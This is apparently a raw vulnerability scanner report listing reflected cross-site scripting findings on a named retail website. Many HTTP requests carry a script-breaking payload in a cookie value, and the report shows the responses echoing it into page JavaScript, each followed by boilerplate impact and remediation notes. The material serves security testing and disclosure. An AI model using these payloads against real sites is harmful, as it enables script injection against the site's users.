GET /coffee-machines HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB76c32</script><script>alert(1)</script>953da364365;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21134 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:59 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... eName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTB76C32</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>953DA364365" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da449</script><script>alert(1)</script>9e10653ba75 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee-machines/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBda449</script><script>alert(1)</script>9e10653ba75;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21134 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:23 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... eName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTBDA449</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9E10653BA75" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8163c</script><script>alert(1)</script>ec3893ac889 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8163c</script><script>alert(1)</script>ec3893ac889;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21224 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:50 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB8163C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>EC3893AC889" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb1e</script><script>alert(1)</script>221b4ee20e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entertainment HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBcdb1e</script><script>alert(1)</script>221b4ee20e3;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16383 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:01 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... rbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTBCDB1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>221B4EE20E3" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687ff</script><script>alert(1)</script>a3b2dc7f084 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entertainment/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB687ff</script><script>alert(1)</script>a3b2dc7f084;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16383 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:44:12 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... rbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTB687FF</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A3B2DC7F084" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b33f</script><script>alert(1)</script>b422eca8919 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /extras/newsletters.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2b33f</script><script>alert(1)</script>b422eca8919;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16365 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:14 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ame="/extras/newsletters.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/extras/newsletters.asp" var s_prop3="SBPTPAHP1SHTB2B33F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B422ECA8919" var s_prop4="" var s_prop5="" var s_prop6="/extras/newsletters.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c1e</script><script>alert(1)</script>c2c9791a405 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/ga_faq_shipop.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB30c1e</script><script>alert(1)</script>c2c9791a405;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42766 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:31 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ist/ga_faq_shipop.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/ga_faq_shipop.asp" var s_prop3="SBPTPAHP1SHTB30C1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C2C9791A405" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/ga_faq_shipop.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de33</script><script>alert(1)</script>0be688d889d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/gareturns.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1de33</script><script>alert(1)</script>0be688d889d;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15086 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:32 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... guestassist/gareturns.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/gareturns.asp" var s_prop3="SBPTPAHP1SHTB1DE33</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0BE688D889D" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/gareturns.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a945e</script><script>alert(1)</script>f60d28581e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/shcontus.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBa945e</script><script>alert(1)</script>f60d28581e3;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20651 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:23 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTBA945E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F60D28581E3" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a7c</script><script>alert(1)</script>702f5512ffc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Content-Length: 12638 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSCDCCADA=FDGBELCBEJODMBJCBCCHOEDB; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:43:09 GMT
<!--S1--><!--S0-->
<!-- Common Function include file -->
<!-- EMail include file -->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HT ...[SNIP]... st/shgaemailconfirm.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shgaemailconfirm.asp" var s_prop3="SBDIRECT78A7C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>702F5512FFC" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shgaemailconfirm.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52800</script><script>alert(1)</script>53ab4bb2221921484 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20750 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=LODAELCBDOILFIIPEOEHDGFF; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:26:07 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB52800</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>53AB4BB2221921484" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus.asp?error=noselection" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddee2</script><script>alert(1)</script>8b507b6fff0 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mya/links.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBddee2</script><script>alert(1)</script>8b507b6fff0;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15659 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:05 GMT Connection: close
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... . */ var s_pageName="/mya/links.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/links.asp" var s_prop3="SBPTPAHP1SHTBDDEE2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>8B507B6FFF0" var s_prop4="" var s_prop5="" var s_prop6="/mya/links.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860c7</script><script>alert(1)</script>9b9756a0816 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mya/track.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB860c7</script><script>alert(1)</script>9b9756a0816;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 18382 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:07 GMT Connection: close
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... . */ var s_pageName="/mya/track.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/track.asp" var s_prop3="SBPTPAHP1SHTB860C7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9B9756A0816" var s_prop4="" var s_prop5="" var s_prop6="/mya/track.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6b5c</script><script>alert(1)</script>9153adaaf8c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/include/SearchNav.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd6b5c</script><script>alert(1)</script>9153adaaf8c;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14427 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:44:17 GMT Connection: close
